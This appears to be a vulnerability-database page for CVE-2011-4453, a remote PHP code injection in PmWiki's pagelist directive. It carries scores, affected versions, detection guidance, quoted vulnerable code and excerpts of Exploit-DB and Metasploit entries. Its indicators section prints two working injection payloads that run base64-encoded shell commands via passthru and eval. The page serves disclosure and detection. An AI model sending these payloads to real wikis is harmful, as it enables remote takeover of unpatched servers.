CVE-2011-4453
published 2011-12-22CVE-2011-4453: The PageListSort function in scripts/pagelist.php in PmWiki 2.x before 2.2.35 allows remote attackers to execute arbitrary code via PHP sequences in a crafted…
PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
53.41%
98.9th percentile
The PageListSort function in scripts/pagelist.php in PmWiki 2.x before 2.2.35 allows remote attackers to execute arbitrary code via PHP sequences in a crafted order parameter in a pagelist directive, leading to unintended use of the PHP create_function function.
Affected
76 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
| pmwiki | pmwiki | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#:)↗
command(:pagelist order=']);error_reporting(0);eval(base64_decode($_SERVER[HTTP_#{header}]));die;#:)↗
- →Detect POST requests to pmwiki.php containing a 'pagelist order=' directive with PHP injection sequences (e.g., ']);, error_reporting, passthru, eval, base64_decode) in the 'text' or 'order' parameter. ↗
- →Alert on HTTP requests to pmwiki.php with a custom HTTP header (e.g., 'Cmd:') carrying base64-encoded OS commands, used to pass commands to the injected passthru/eval payload via $_SERVER[HTTP_CMD]. ↗
- →Flag POST requests to pmwiki.php with action=edit&post=save and a 'text' body containing '(:pagelist order=' followed by PHP code sequences such as ']);error_reporting(0);. ↗
- →Monitor for the version fingerprint request to pmwiki.php?n=PmWiki.Version, which is used by the Metasploit module to check if the target is running a vulnerable version (pmwiki-2.0.0 to 2.2.34). ↗
- ·Exploitation may require authentication if the wiki is not configured for public write access; unauthenticated exploitation is only possible on publicly writable PmWiki instances. ↗
- ·The vulnerability affects PmWiki versions 2.0.0 through 2.2.34; version 2.2.35 and later are patched. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)
exploitdb·2011-12-14
CVE-2011-4453 PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PmWiki %q{
This module exploits an arbitrary command execution vulnerability
in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is
inside /scripts/pagelist.php.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
],
'References' =>
[
['CVE', '2011-4453'],
['BID', '50776'],
['OSVDB', '77261'],
['URL', 'http://www.exploit-db.com/exploits/18149/'],
['URL', '
Exploit-DB
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)
exploitdb·2011-11-23
CVE-2011-4453 PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)
---
$r) {
454. if (@$PageListSortCmp[$o])
455. $code .= "\$c = {$PageListSortCmp[$o]}; ";
456. else
457. $code .= "\$c = @strcasecmp(\$PCache[\$x]['$o'],\$PCache[\$y]['$o']); ";
458. $code .= "if (\$c) return $r\$c;\n";
459. }
460. StopWatch('PageListSort sort');
461. if ($code)
462. uasort($list,
463. create_function('$x,$y', "global \$PCache; $code return 0;"));
464. StopWatch('PageListSort end');
Input passed through 'order' parameter of 'pagelist' directive isn't properly sanitized before being used
in a call to create_function() at line 463. This can be exploited to inject and execute arbitrary PHP code.
Successful exploitation of this vulnerability might require authentication if the wiki isn't public writable.
[-] Disclosu
Metasploit
PmWiki pagelist.php Remote PHP Code Injection Exploit
metasploit
PmWiki pagelist.php Remote PHP Code Injection Exploit
PmWiki pagelist.php Remote PHP Code Injection Exploit
This module exploits an arbitrary command execution vulnerability in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is inside /scripts/pagelist.php.
2011-12-22
Published